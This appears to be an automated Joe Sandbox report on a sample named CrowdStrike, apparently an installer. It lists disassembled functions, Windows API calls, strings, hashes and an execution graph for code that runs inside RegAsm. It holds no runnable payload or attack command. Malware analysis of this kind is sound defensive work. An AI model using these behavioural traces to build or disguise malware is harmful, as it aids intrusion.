                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                        • String ID: Section: "%s"$Skipping section: "%s"
                                                                        • API String ID: 2266616436-4211696005
                                                                        • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                        • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                        • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                        • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                        Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDC.USER32(?), ref: 00402100
                                                                        • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                        • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                        • String ID:
                                                                        • API String ID: 1599320355-0
                                                                        • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                        • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                        • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                        • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                        Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                        • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                        • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                        • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcpyn$CreateFilelstrcmp
                                                                        • String ID: Version
                                                                        • API String ID: 512980652-315105994
                                                                        • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                        • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                        • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                        • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                        Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                        • GetTickCount.KERNEL32 ref: 00403303
                                                                        • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                        • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                        • String ID:
                                                                        • API String ID: 2102729457-0
                                                                        • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                        • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                        • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                        • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                        Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                        • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                        • String ID:
                                                                        • API String ID: 2883127279-0
                                                                        • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                        • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                        • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                        • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                        Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: Window$EnableShowlstrlenwvsprintf
                                                                        • String ID: HideWindow
                                                                        • API String ID: 1249568736-780306582
                                                                        • Opcode ID: 2f246f05ebd7dc674da9b5ff0baef701d10e4a3e2a51ec62881f8ce9e704e4b5
                                                                        • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                        • Opcode Fuzzy Hash: 2f246f05ebd7dc674da9b5ff0baef701d10e4a3e2a51ec62881f8ce9e704e4b5
                                                                        • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                        Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                        • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfileStringlstrcmp
                                                                        • String ID: !N~
                                                                        • API String ID: 623250636-529124213
                                                                        • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                        • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                        • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                        • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                        Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                        • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                        Strings
                                                                        • Error launching installer, xrefs: 00405C48
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateHandleProcess
                                                                        • String ID: Error launching installer
                                                                        • API String ID: 3712363035-66219284
                                                                        • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                        • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                        • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                        • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                        Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                        • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                          • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandlelstrlenwvsprintf
                                                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                                                        • API String ID: 3509786178-2769509956
                                                                        • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                        • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                        • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                        • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                        Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                        • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                        • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                        • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 190613189-0
                                                                        • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                        • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                        • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                        • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                                        Execution Graph

                                                                        Execution Coverage:16.1%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:70
                                                                        Total number of Limit Nodes:1
                                                                        execution_graph 10004 cf0848 10005 cf086c 10004->10005 10006 cf0927 10005->10006 10012 cf0b00 10005->10012 10016 cf0b10 10005->10016 10007 cf096b 10006->10007 10010 cf0b00 2 API calls 10006->10010 10011 cf0b10 2 API calls 10006->10011 10010->10007 10011->10007 10020 cf5045 10012->10020 10030 cf5090 10012->10030 10013 cf0b2c 10013->10006 10017 cf0b2c 10016->10017 10018 cf5045 2 API calls 10016->10018 10019 cf5090 2 API calls 10016->10019 10017->10006 10018->10017 10019->10017 10022 cf4ffc 10020->10022 10021 cf52a7 10061 cf4cec 10021->10061 10022->10020 10024 cf52d5 10022->10024 10040 cf59d9 10022->10040 10044 cf5a10 10022->10044 10048 cf5a00 10022->10048 10052 cf59e8 10022->10052 10056 cf5a48 10022->10056 10024->10013 10032 cf50f3 10030->10032 10031 cf52d5 10031->10013 10032->10031 10035 cf59d9 DuplicateHandle 10032->10035 10036 cf5a48 DuplicateHandle 10032->10036 10037 cf59e8 DuplicateHandle 10032->10037 10038 cf5a00 DuplicateHandle 10032->10038 10039 cf5a10 DuplicateHandle 10032->10039 10033 cf52a7 10034 cf4cec MessageBoxW 10033->10034 10034->10031 10035->10033 10036->10033 10037->10033 10038->10033 10039->10033 10041 cf59f1 10040->10041 10065 cf5010 10041->10065 10045 cf5a20 10044->10045 10047 cf5a3d 10045->10047 10073 cf5020 10045->10073 10047->10021 10049 cf5a20 10048->10049 10050 cf5a3d 10049->10050 10051 cf5020 DuplicateHandle 10049->10051 10050->10021 10051->10050 10053 cf59f1 10052->10053 10054 cf5010 DuplicateHandle 10053->10054 10055 cf59fc 10054->10055 10055->10021 10058 cf5a10 10056->10058 10060 cf5a57 10056->10060 10057 cf5a3d 10057->10021 10058->10057 10059 cf5020 DuplicateHandle 10058->10059 10059->10057 10060->10021 10062 cf8700 MessageBoxW 10061->10062 10064 cf878c 10062->10064 10064->10024 10066 cf501b 10065->10066 10067 cf6c5a 10066->10067 10069 cf64a0 10066->10069 10070 cf64ab 10069->10070 10071 cf5a10 DuplicateHandle 10070->10071 10072 cf6d39 10070->10072 10071->10072 10072->10067 10074 cf502b 10073->10074 10078 cf6608 10074->10078 10082 cf6618 10074->10082 10075 cf6163 10075->10047 10079 cf660d 10078->10079 10085 cf5ea4 10079->10085 10083 cf5ea4 DuplicateHandle 10082->10083 10084 cf6646 10082->10084 10083->10084 10084->10075 10086 cf6680 DuplicateHandle 10085->10086 10087 cf6646 10086->10087 10087->10075 10088 cf8280 10089 cf82cf 10088->10089 10092 cf7e7c 10089->10092 10094 cf8370 EnumThreadWindows 10092->10094 10095 cf8350 10094->10095

                                                                        Executed Functions

                                                                        Function 00CF7E6C Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 438 cf7e6c-cf83b2 441 cf83be-cf83ee EnumThreadWindows 438->441 442 cf83b4 438->442 443 cf83f7-cf8424 441->443 444 cf83f0-cf83f6 441->444 445 cf83bc 442->445 444->443 445->441
                                                                        APIs
                                                                        • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E58,?,?,00CF8350,036E4100,?), ref: 00CF83E1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.3704854503.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_cf0000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: EnumThreadWindows
                                                                        • String ID:
                                                                        • API String ID: 2941952884-0
                                                                        • Opcode ID: 263c444de3909c1cf740694ac4958b1d512c027fee2c2741c91a00d32571282d
                                                                        • Instruction ID: ceb0a2ede26e655ce7df782e92c437ee505562c50fb44f3f2537cf74eea6f40b
                                                                        • Opcode Fuzzy Hash: 263c444de3909c1cf740694ac4958b1d512c027fee2c2741c91a00d32571282d
                                                                        • Instruction Fuzzy Hash: 602190B19042498FDB10CF99C844BEEFBF4EF48310F04846AD498A7360D778A948CFA5
                                                                        Function 00CF5EA4 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 448 cf5ea4-cf6714 DuplicateHandle 450 cf671d-cf673a 448->450 451 cf6716-cf671c 448->451 451->450
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00CF6646,?,?,?,?,?), ref: 00CF6707
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.3704854503.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_cf0000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 8ff58a0079ad1274056a36b9aaf6a4d412520aba7229c9a54c256eeb0e08c5de
                                                                        • Instruction ID: a7bb2dd601b3016244cee046896016c00259c4197c9a64918799413ad67379f0
                                                                        • Opcode Fuzzy Hash: 8ff58a0079ad1274056a36b9aaf6a4d412520aba7229c9a54c256eeb0e08c5de
                                                                        • Instruction Fuzzy Hash: 242116B5900208EFDB10CFAAD984AEEBBF4EB48314F14841AE954B3310D374A940CFA5
                                                                        Function 00CF6679 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 454 cf6679-cf6714 DuplicateHandle 455 cf671d-cf673a 454->455 456 cf6716-cf671c 454->456 456->455
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00CF6646,?,?,?,?,?), ref: 00CF6707
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.3704854503.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_cf0000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 691c342c3795a5cddc900fdb1b63ab30f2f72e73d7df6aa5a750e1b34e9a1fcd
                                                                        • Instruction ID: 6445c00ead4657e9843c12d432ef03e2eaacfd69750aefca098a4423d19c6153
                                                                        • Opcode Fuzzy Hash: 691c342c3795a5cddc900fdb1b63ab30f2f72e73d7df6aa5a750e1b34e9a1fcd
                                                                        • Instruction Fuzzy Hash: D621E3B5901249AFDB10CFAAD584ADEBBF4EB48324F14841AE958A7210D378A944CFA5
                                                                        Function 00CF7E7C Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 459 cf7e7c-cf83b2 461 cf83be-cf83ee EnumThreadWindows 459->461 462 cf83b4 459->462 463 cf83f7-cf8424 461->463 464 cf83f0-cf83f6 461->464 465 cf83bc 462->465 464->463 465->461
                                                                        APIs
                                                                        • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E58,?,?,00CF8350,036E4100,?), ref: 00CF83E1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.3704854503.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_cf0000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: EnumThreadWindows
                                                                        • String ID:
                                                                        • API String ID: 2941952884-0
                                                                        • Opcode ID: 54003230b5556fbb3b6bedc4f2cbe77eeba6d3ce2d9be5e6c8256eee7e88c2aa
                                                                        • Instruction ID: 9fa9a0d558eb4985322fcd6c3961ead26858f46d83af7b139e198d75c69a485d
                                                                        • Opcode Fuzzy Hash: 54003230b5556fbb3b6bedc4f2cbe77eeba6d3ce2d9be5e6c8256eee7e88c2aa
                                                                        • Instruction Fuzzy Hash: FE214CB19042098FDB54CF9AC844BEEFBF4EB48310F148429D554A7360DB74A948CFA5
                                                                        Function 00CF8368 Relevance: 1.6, APIs: 1, Instructions: 61threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 468 cf8368-cf83b2 469 cf83be-cf83ee EnumThreadWindows 468->469 470 cf83b4 468->470 471 cf83f7-cf8424 469->471 472 cf83f0-cf83f6 469->472 473 cf83bc 470->473 472->471 473->469
                                                                        APIs
                                                                        • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E58,?,?,00CF8350,036E4100,?), ref: 00CF83E1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.3704854503.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_cf0000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: EnumThreadWindows
                                                                        • String ID:
                                                                        • API String ID: 2941952884-0
                                                                        • Opcode ID: 26d0e2221b6603de15cbe852792cf400e437e980dfac219ac73475ed3dd0eaf2
                                                                        • Instruction ID: d594967a39082453af3a01ba7928f2be246385c69bac29669365badf0132699b
